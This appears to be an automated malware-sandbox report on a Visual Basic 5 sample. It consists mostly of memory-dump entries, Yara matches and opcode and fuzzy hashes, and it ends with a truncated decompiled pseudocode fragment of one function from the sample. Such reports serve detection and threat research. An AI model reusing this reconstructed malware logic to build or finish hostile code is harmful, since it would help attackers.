        • Source File: 00000006.00000002.2355935745.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000006.00000002.2355931397.0000000000400000.00000002.00020000.sdmp
        • Associated: 00000006.00000002.2355957257.0000000000435000.00000004.00020000.sdmp
        • Associated: 00000006.00000002.2355962315.0000000000436000.00000002.00020000.sdmp
        Similarity
        • API ID: #100
        • String ID: VB5!6%*
        • API String ID: 1341478452-4246263594
        • Opcode ID: 5f024488ff9672cb9e96c30a68833fbea30e7569b078e3e64589e2d633f80c4b
        • Instruction ID: 9a1096f8a0c9cb9102b560f3722554ea82e1537a9b8d88e42daa921e95f26e6d
        • Opcode Fuzzy Hash: 5f024488ff9672cb9e96c30a68833fbea30e7569b078e3e64589e2d633f80c4b
        • Instruction Fuzzy Hash: 4F8162A644E3C15FD7438BB899656917FB1AE23218B0F45DBC4C1CF0B3E2A9590AD732
        Uniqueness

        Uniqueness Score: -1.00%

        Non-executed Functions

        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID: J_($Rn/$Rn/$^Zi$_K$d@0!$n?SK$*G$JK
        • API String ID: 0-1906473922
        • Opcode ID: f3422d547e73e0428b29bec84574c8e7f20aad939db443c795b9e2ac30fe8f27
        • Instruction ID: 838444554606acd522f16eb2ca87980d139af54e7e39e2dbbbd239d57aa5e8c6
        • Opcode Fuzzy Hash: f3422d547e73e0428b29bec84574c8e7f20aad939db443c795b9e2ac30fe8f27
        • Instruction Fuzzy Hash: 628266B160034ADFDB308E78CD957DA77A2FF59350F95812ADC8D9B204D3349A86CB52
        Uniqueness

        Uniqueness Score: -1.00%

        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID: J_($Rn/$Rn/$^Zi$_K$d@0!$n?SK$*G$JK
        • API String ID: 0-1906473922
        • Opcode ID: eb45a0b08d16ef1c91ac2c6df60950d908e2c2ebaf47a2a45241a12c685392a7
        • Instruction ID: f12a038c5e05294ca5dbacdcef8ee16910cb536923a198594ba0ddab2d9fffa0
        • Opcode Fuzzy Hash: eb45a0b08d16ef1c91ac2c6df60950d908e2c2ebaf47a2a45241a12c685392a7
        • Instruction Fuzzy Hash: CF82547160434A9FDB348E78CD947DA77A2FF1A350F94822EDC8D9B245D3348A86CB42
        Uniqueness

        Uniqueness Score: -1.00%

        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID: J_($Rn/$Rn/$^Zi$_K$d@0!$n?SK$*G$JK
        • API String ID: 0-1906473922
        • Opcode ID: a4437abaa23efece04aeae2b1f1dc64b4502cc4bf0e44b924140cfa53641fc78
        • Instruction ID: 1876e0954309e929bcf825a5dc6e3d63d81fe36791bf79377ec9b40f95bcd21c
        • Opcode Fuzzy Hash: a4437abaa23efece04aeae2b1f1dc64b4502cc4bf0e44b924140cfa53641fc78
        • Instruction Fuzzy Hash: 638254B260034A9FDB309F78CD947DA77A2FF5A350F94812ADC899B200D3749A85CB52
        Uniqueness

        Uniqueness Score: -1.00%

        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID: J_($Rn/$Rn/$^Zi$_K$d@0!$n?SK$*G$JK
        • API String ID: 0-1906473922
        • Opcode ID: 87652bb9e89fd4485b5cc158590c36ec90b3e049c01afc01b3dc547cb688b3bb
        • Instruction ID: ecb0573b3d5c6a3095cd5381b759f5d31fe78273a8085fbf1821fcfd4fad745a
        • Opcode Fuzzy Hash: 87652bb9e89fd4485b5cc158590c36ec90b3e049c01afc01b3dc547cb688b3bb
        • Instruction Fuzzy Hash: C07264B260034ADFDB309F78CD957DA77A2FF1A350F95812ADC899B204D3749A85CB42
        Uniqueness

        Uniqueness Score: -1.00%

        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID: J_($Rn/$Rn/$^Zi$*G$JK
        • API String ID: 0-574496016
        • Opcode ID: d6b62564e5c9319851b4dda84e16d7188db732fdc288302ecbf4b883eb6cbe41
        • Instruction ID: 93fce57343b329e3f42ef4b0746840265feecd96130bacce682d5b749feb65bf
        • Opcode Fuzzy Hash: d6b62564e5c9319851b4dda84e16d7188db732fdc288302ecbf4b883eb6cbe41
        • Instruction Fuzzy Hash: 915223B260034ADFDB309F78CD957DA77A2FF19350F84812ADC899B200D3749A86CB91
        Uniqueness

        Uniqueness Score: -1.00%

        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID: J_($Rn/$Rn/$*G
        • API String ID: 0-214948836
        • Opcode ID: fd26406aa42d1f086059706d7c501c911bd859b0cf9ff87819124bfb3beadae7
        • Instruction ID: 53f9f29a7a0f066f8c8cce1ce2dcc57e77e755f12274abd416380f5eb8e3ce27
        • Opcode Fuzzy Hash: fd26406aa42d1f086059706d7c501c911bd859b0cf9ff87819124bfb3beadae7
        • Instruction Fuzzy Hash: 0A121272611349DFEF309E78CDA57DA37A2FF1A350F95812ADC8D9B200D3748A868B51
        Uniqueness

        Uniqueness Score: -1.00%

        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID: J_($Rn/$Rn/$*G
        • API String ID: 0-214948836
        • Opcode ID: 4857aba5639b5b0bfe865bb4209fc0ffa2b9daea1229c6df02f92f1c275af324
        • Instruction ID: 51e6eb735ee2bcb8aa34c2cd61f7195783ef58319a8add70ad8f7b6e48a010d5
        • Opcode Fuzzy Hash: 4857aba5639b5b0bfe865bb4209fc0ffa2b9daea1229c6df02f92f1c275af324
        • Instruction Fuzzy Hash: 68F15471611349DFEF319E78CD947DA37A2FF1A350F84812ADD8D9B204D3708A868B92
        Uniqueness

        Uniqueness Score: -1.00%

        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID: J_($Rn/$Rn/$*G
        • API String ID: 0-214948836
        • Opcode ID: 6c9721978300bbeec95b900a59e302c75e9ec7cfac3a5cffc3e4e019ca07b1a6
        • Instruction ID: 973a381894ae318a0da28b7eecad21981ac4c25d465b0c62a06cfc6bdd4396f8
        • Opcode Fuzzy Hash: 6c9721978300bbeec95b900a59e302c75e9ec7cfac3a5cffc3e4e019ca07b1a6
        • Instruction Fuzzy Hash: ECC11171651349DFEF308E78CD957DA3BA2FF5A350F84812ADC8C9B204D3719A8A8B51
        Uniqueness

        Uniqueness Score: -1.00%

        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID: J_($Rn/$Rn/$*G
        • API String ID: 0-214948836
        • Opcode ID: 45cd18c1eb9f7c329155a3e23152a197b2bf56a03e03a22f57fe6de157cfc53f
        • Instruction ID: 51c6111103ff6d3452cf7a4ffdf619e30cbdd95228f024a39e562a7bf28f109b
        • Opcode Fuzzy Hash: 45cd18c1eb9f7c329155a3e23152a197b2bf56a03e03a22f57fe6de157cfc53f
        • Instruction Fuzzy Hash: 2CC10271651349DFEF308E78CD95BDA37A2FF5A310F84812AEC8C8B204D3719A968B51
        Uniqueness

        Uniqueness Score: -1.00%

        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID: ".M$vD&$*;h
        • API String ID: 0-431630790
        • Opcode ID: e5c77663917ea425dc111942944fe031c32474bb7d84a65048e46a77e1263fad
        • Instruction ID: afc8286af6c8246bb40914f39f16434af055dc76aa4f965852e0bd739dde2027
        • Opcode Fuzzy Hash: e5c77663917ea425dc111942944fe031c32474bb7d84a65048e46a77e1263fad
        • Instruction Fuzzy Hash: 0BC146716103869FDB30DF38CD99BEA77A2AF55360F96815AEC4D9B151D3308A81CF12
        Uniqueness

        Uniqueness Score: -1.00%

        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID: _K$n?SK
        • API String ID: 0-3414572539
        • Opcode ID: dc1613f30fce24b3abc3d90fed963d170564e26ea5ac6c1e431cc1e30e35cb7e
        • Instruction ID: e6ddc7d3e1f21b3786626d4f22a31dfebe0dccf0c5e21439ce4ac4966d585257
        • Opcode Fuzzy Hash: dc1613f30fce24b3abc3d90fed963d170564e26ea5ac6c1e431cc1e30e35cb7e
        • Instruction Fuzzy Hash: 6C21A872B1430A5FCB681E689E947EF32E3EF92320FA68019DC8AA7100D3748D808606
        Uniqueness

        Uniqueness Score: -1.00%

        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID: *G
        • API String ID: 0-1675791495
        • Opcode ID: c0306323d311eaede4ee2e3a36d98503914e2c87f85fc977c4d8ec210b7ac711
        • Instruction ID: a635a1f20c282ab7b5f752588691b789cc0cf0c742419df222968cc0adbf4371
        • Opcode Fuzzy Hash: c0306323d311eaede4ee2e3a36d98503914e2c87f85fc977c4d8ec210b7ac711
        • Instruction Fuzzy Hash: BB7135716512599FEF35DE38CD457DA3BE2FF1A310F84811AEC8D8B204D7708A868B92
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: fdfbdd02eb660a0ac61e7da16c583523913027c3b6723d8ce9f31aabafdbc6e9
        • Instruction ID: aee318b4765eefec68e6833c301d888f11d143d52e605c484b7520e0e4ac560e
        • Opcode Fuzzy Hash: fdfbdd02eb660a0ac61e7da16c583523913027c3b6723d8ce9f31aabafdbc6e9
        • Instruction Fuzzy Hash: 61C18672A1870ADFDF30DE28C8957EA77A2AF45350F55812EDC4D9B205E3309E91CB82
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: fadebeef30ae4258c6023e97f09a12056a0981ad7515e5f968ba92292eedbb0c
        • Instruction ID: 93f48d59f4f8f4531b499f3e085e3ccae13c2a356e200e5cf8e2157f333d7844
        • Opcode Fuzzy Hash: fadebeef30ae4258c6023e97f09a12056a0981ad7515e5f968ba92292eedbb0c
        • Instruction Fuzzy Hash: 1C91F27160434A9FCB349E288DE57EF37A6AF59380F95842EDC8DD7205C7319A868B12
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 706749d4622b2fe5ffc39f69b11e384af27cca2cd802228e73fdcaff84cffaa9
        • Instruction ID: 156f106db96a3d67dd67cb4f38fde401a1734e9ac6e9dade54078dcba913b2be
        • Opcode Fuzzy Hash: 706749d4622b2fe5ffc39f69b11e384af27cca2cd802228e73fdcaff84cffaa9
        • Instruction Fuzzy Hash: FE81E57561034ACFDB34DE79C8A57EA7B72BF99310F95812ADC0E8B254D3318A86CB41
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 84b09b120130231f386c830bd9fa0e9c8eb5a2a4664dbcecbb62a69cb8e8206e
        • Instruction ID: c85f45a177d58490c499d5baa2d82ab8651549aebdb0c31b8d5df7a067fe84ce
        • Opcode Fuzzy Hash: 84b09b120130231f386c830bd9fa0e9c8eb5a2a4664dbcecbb62a69cb8e8206e
        • Instruction Fuzzy Hash: 0F81043461034ACFDB39DE79C8A57DA7B72BF95310F94816ADC0E8B254D3318A85CB41
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 2be7d61713ed6ee7102cd2004f72d58ec09c8695e3b497dda316c457fcb9219b
        • Instruction ID: 26a12d2af2e0660bceda60aa643ea555b8647dd848ce973f47ec4eef5ec869c7
        • Opcode Fuzzy Hash: 2be7d61713ed6ee7102cd2004f72d58ec09c8695e3b497dda316c457fcb9219b
        • Instruction Fuzzy Hash: EC611471A0439A9BCB349E288C657DA7BA2EF96390FD5412EECCDD7201D3315986CB42
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 881b9cd5a0c7c705d2347de4e043bfcc2a9264c4e9a761a7da0d8084e14317ab
        • Instruction ID: 211db4a7de250f669dc40bf4628c3d4be58b39ac2072ee931a226148ab60c67c
        • Opcode Fuzzy Hash: 881b9cd5a0c7c705d2347de4e043bfcc2a9264c4e9a761a7da0d8084e14317ab
        • Instruction Fuzzy Hash: 2471D37461034ACFDB39DE79C9A97DA7772BF99300F94812ACC4E8B258D7318A85CB41
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 34bbbedb39c15a2c8a8b6010226b9ff0e39b05eeaabe72feb147376d846b5090
        • Instruction ID: 25ae2b20b3f9a92997608d0eee37294fa50a04a5b713c616ebf4ec0d406b6be6
        • Opcode Fuzzy Hash: 34bbbedb39c15a2c8a8b6010226b9ff0e39b05eeaabe72feb147376d846b5090
        • Instruction Fuzzy Hash: 3561F07461038ACFDB35DE39C8A57EA7B72BF55310F95812ACC0E9B254D3318A86CB41
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: de05062ab0a514a444d98b4cf256c06a3789be3446f4184a3272ba31453a33b3
        • Instruction ID: 3847bfd591c4ff282f1cf8e552a57990e94b71cc5569b08d765c5f6734ee0623
        • Opcode Fuzzy Hash: de05062ab0a514a444d98b4cf256c06a3789be3446f4184a3272ba31453a33b3
        • Instruction Fuzzy Hash: E451E131A0435A9BCB349E2888A97DB77A2EF99350FD6402EECCDD7204D7314D86CB46
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 8a5f85d1cc757a6288315de7bcb5ed95347576ecc93cb03a18d06174a9b33d10
        • Instruction ID: c4faa06271b0a9679db667703589f75a50ce8ce0db2b92a8be6693dbe82d62f4
        • Opcode Fuzzy Hash: 8a5f85d1cc757a6288315de7bcb5ed95347576ecc93cb03a18d06174a9b33d10
        • Instruction Fuzzy Hash: 9561013561038ACFDB39DE79C8A5BDA3B72BF55310F94816ACC0E9B255D3318A85CB41
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 22547901009b7e4b661ff296db68b598bf2d5cf93eb7e0098cdfe76af221af44
        • Instruction ID: 4ae71bb3e04e857fa3f8ed77af52cb8fa3788a95890b70bb8bedca4cb06b422b
        • Opcode Fuzzy Hash: 22547901009b7e4b661ff296db68b598bf2d5cf93eb7e0098cdfe76af221af44
        • Instruction Fuzzy Hash: F3515876918359DFDB30DE9988956EAB7A2AF457A0F56402ECC485B200D3711F92CBC2
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: a4a17dddd4ab4d97e7ade0ba3702c7668bd72e43dfed222669e7b97ac4a4cf4c
        • Instruction ID: ebc6d75bbfa2b246b807d8bb4b34373856667f9a145d2106d3c391c728a89c92
        • Opcode Fuzzy Hash: a4a17dddd4ab4d97e7ade0ba3702c7668bd72e43dfed222669e7b97ac4a4cf4c
        • Instruction Fuzzy Hash: 12517672A187569FDF308E69C8953EBB3A2AF45350F5A811BCC8C97205D3316E91CBC2
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 031acb43d198d195e210c62f0e5640ad21f3e3f6f076f58aff68052130cd9e8f
        • Instruction ID: ca3d57ee39fafe4e93beabb7e60bab8bac738a8aff8a5c849ad6c4fd24a72b79
        • Opcode Fuzzy Hash: 031acb43d198d195e210c62f0e5640ad21f3e3f6f076f58aff68052130cd9e8f
        • Instruction Fuzzy Hash: 585155729587569FCF30CE69C8947DAB7A2AF49750F1A812FCC8C5B204C3316E91CB82
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 0bb153bc4347e046e60485cb1a1d636f45197adfac296346711e7591f8e4c7cb
        • Instruction ID: bd639ec52f6182c1d21a9b0147447a45dc757bb93369ac942d1fbe84841c21a8
        • Opcode Fuzzy Hash: 0bb153bc4347e046e60485cb1a1d636f45197adfac296346711e7591f8e4c7cb
        • Instruction Fuzzy Hash: E1513872B103458BCB34CE2AC9E53DA73F2AF49340F54812ECD4E8BA04D735AA51CB16
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 6dd5dc23cf328aa7db8e53bf0fbc733d5256670f8bc3e2f30aac520fa8d08d9d
        • Instruction ID: 463264347e2b18594064ffe13748be39e29163fad2af9f8748c2f0d792d06028
        • Opcode Fuzzy Hash: 6dd5dc23cf328aa7db8e53bf0fbc733d5256670f8bc3e2f30aac520fa8d08d9d
        • Instruction Fuzzy Hash: 99513672A187569FDF30CE69C8957DAB7B2AF49350F5A811BCC8897204C3316E91CBC2
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 837498b268241e0de8332fa2523aa0faf924ff12ac40f17729346a9bbcdf21ac
        • Instruction ID: acc69139434fdc6a5089932bb32e3d6560a9c3b656274e8a66be01e7a1b2b98d
        • Opcode Fuzzy Hash: 837498b268241e0de8332fa2523aa0faf924ff12ac40f17729346a9bbcdf21ac
        • Instruction Fuzzy Hash: 865145769587569FCF30CE6988947DAB7A2AF49350F1A802FCC8C5B205C3316F91CB92
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 366e521a213802037d496abbeab4438301bfb06dcf8062d0202827548d285319
        • Instruction ID: d7898cc92aa587fd79254390e4fbb8dafe838201cc2135ef436ed484811bcb2b
        • Opcode Fuzzy Hash: 366e521a213802037d496abbeab4438301bfb06dcf8062d0202827548d285319
        • Instruction Fuzzy Hash: A35145729187169FDF308E6988947DAB3A2AF59750F46811FCC8C57204D3712F91CBD2
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 699a746ce4f031364549ff462b160499e94e104cb998fd49ba235a6272b2fbc0
        • Instruction ID: f5c2b185eab17aa3d8e648fad1c4dd31ae67febbd34c90cc5d2d1b2fd4a1cb44
        • Opcode Fuzzy Hash: 699a746ce4f031364549ff462b160499e94e104cb998fd49ba235a6272b2fbc0
        • Instruction Fuzzy Hash: 3D5147715583C68FCF359E388CA93DA7AA2AF12320F49C2A9CC9DCF246D7318541C762
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 066c8b5750a1a120f08065b9dc339ca7bcaddcc190836f0d4180e1d8d8b36656
        • Instruction ID: 2c6cc4ebbf5549702329ef2dd586c68217e1b7ab878bf7643a0a3b3f43c876af
        • Opcode Fuzzy Hash: 066c8b5750a1a120f08065b9dc339ca7bcaddcc190836f0d4180e1d8d8b36656
        • Instruction Fuzzy Hash: A741D03461034ACFDB39DE29C8A57EA3772BF95310F94816ADC4E8B294D731CA81CB51
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: c79602d37295ab75fd4be6158f6abf09328f1b07f901779beff8f1e5aa7e1c3c
        • Instruction ID: 102c9e2c2cbcc549acf60851f9aa3a4544b89cdba1a11b3e2631218433899908
        • Opcode Fuzzy Hash: c79602d37295ab75fd4be6158f6abf09328f1b07f901779beff8f1e5aa7e1c3c
        • Instruction Fuzzy Hash: CF3179B611534A9FEB30EF648DD57EA7BA3AF553A4FA28129DC4C5B201C3714A86CA10
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 2d0832d5ccd0b632be7ae35205905394b996e191f6066bcd72db441df32190fa
        • Instruction ID: b507b1437543a2de559b5beeab5c02b3f6253b77a485ef6993f7adb94fe8401f
        • Opcode Fuzzy Hash: 2d0832d5ccd0b632be7ae35205905394b996e191f6066bcd72db441df32190fa
        • Instruction Fuzzy Hash: 0F4124B251838EDFCB309E6498956DE7BA5BF08358FD2042EDC4CE7601D3719A85CB41
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: effea3e48eae48c3e8ad68349fcc9e035669d1cbe3c224913bf3a703520b2dd9
        • Instruction ID: 6a94a29b3e555604610a9c43c9f459bc320fe0fc09a934e5f2bcc3e104d95e79
        • Opcode Fuzzy Hash: effea3e48eae48c3e8ad68349fcc9e035669d1cbe3c224913bf3a703520b2dd9
        • Instruction Fuzzy Hash: 0B41DDB1A047469FD765DF68C8D8BDAB7A5FF18390F928029DC898B212D774DA818F40
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: a647b2196b5d2b615d700f461ea7e69eae83e402b998bee2024b229f0a9ee08b
        • Instruction ID: ba0e878028f31239f557a0d3a3ab7c41503db5afdcb0d50417d43d021f2ebcea
        • Opcode Fuzzy Hash: a647b2196b5d2b615d700f461ea7e69eae83e402b998bee2024b229f0a9ee08b
        • Instruction Fuzzy Hash: 57312A7140C1E68FD731DAF44CC94A2FB39BB5A335788838ED8644D49ADA25C0B6D3A3
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 82877460d6475414a78dc0aefbdff8140516305d48f92ad26848ded1da101a50
        • Instruction ID: 0abeca8bc7787b240f64b550cf1c4eea37252825531e0ee2a42e2a00d8154a41
        • Opcode Fuzzy Hash: 82877460d6475414a78dc0aefbdff8140516305d48f92ad26848ded1da101a50
        • Instruction Fuzzy Hash: 3A215C72A097088FDB28AE35C9A57EBB7A3EFE1300F42842DD8CA47514C33448C6CB06
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 4ec5a6a592009478e64112dbfc18298899b25db471413055c37b6c7d834b66ac
        • Instruction ID: 480b1c9ce74bd21ee6082f753385079b8792b693b63b3c1da8e84eab67eb82b1
        • Opcode Fuzzy Hash: 4ec5a6a592009478e64112dbfc18298899b25db471413055c37b6c7d834b66ac
        • Instruction Fuzzy Hash: 70B09274312640CFC241CE19C1A0F8173B0FB08A90B810480E8028BF11C228E8008B00
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 46%
        			E00433C94(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
        				signed int _v8;
        				intOrPtr _v12;
        				intOrPtr _v16;
        				signed int _v28;
        				signed int _v32;
        				signed int _v36;
        				signed int _v40;
        				signed int _v48;
        				void* _v56;
        				char* _v64;
        				signed int _v72;
        				intOrPtr _v80;
        				signed int _v88;
        				intOrPtr _v96;
        				signed int _v104;
        				intOrPtr _v112;
        				signed int _v120;
        				intOrPtr _v128;
        				signed int _v136;
        				intOrPtr* _v156;
        				intOrPtr* _t51;
        				signed int _t53;
        				intOrPtr _t54;
        				void* _t56;
        				intOrPtr* _t64;
        				signed int _t69;
        				void* _t87;
        				void* _t89;
        				intOrPtr _t90;
        				intOrPtr _t99;
        
        				_t90 = _t89 - 0xc;
        				 *[fs:0x0] = _t90;
        				_v16 = _t90 - 0x94;
        				_v12 = 0x401140;
        				_v8 = 0;
        				_t51 = _a4;
        				 *((intOrPtr*)( *_t51 + 4))(_t51, __edi, __esi, __ebx,  *[fs:0x0], 0x401226, _t87);
        				_t69 = 2;
        				_t53 =  &_v56;
        				_push(_t53);
        				_push(1);
        				_v56 = 0;
        				_push(L"FGFG");
        				_v28 = 0;
        				_v32 = 0;
        				_v36 = 0;
        				_v40 = 0;
        				_v72 = 0;
        				_v88 = 0;
        				_v104 = 0;
        				_v120 = 0;
        				_v136 = 0;
        				_v48 = _t69;
        				_v56 = _t69;
        				L004012F2();
        				L0040136A();
        				_push(_t53);
        				_push(0x431dbc);
        				L00401352();
        				asm("sbb esi, esi");
        				L0040134C();
        				L0040133A();
        				if( ~( ~( ~_t53)) != 0) {
        					_t99 =  *0x435448; // 0x24f6f4
        					if(_t99 == 0) {
        						_push(0x435448);
        						_push(0x431ad4);
        						L00401364();
        					}
        					_v104 = _t69;
        					_t54 = 3;
        					_v136 = _t54;
        					_v128 = 0x16bec2;
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					_v120 = _t54;
        					_v112 = 0x12b06b;
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					_v96 = 0x18;
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					_v88 = _t54;
        					_t64 =  *0x435448; // 0x24f6f4
        					_v80 = 0x5ead28;
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					_v64 = L"PIKARESKE";
        					_v72 = 8;
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					_v156 = _t64;
        					asm("movsd");
        					_t56 =  *((intOrPtr*)( *_t64 + 0x44))(_t64,  &_v40);
        					asm("fclex");
        					if(_t56 < 0) {
        						_push(0x44);
        						_push(0x431ac4);
        						_push(_v156);
        						_push(_t56);
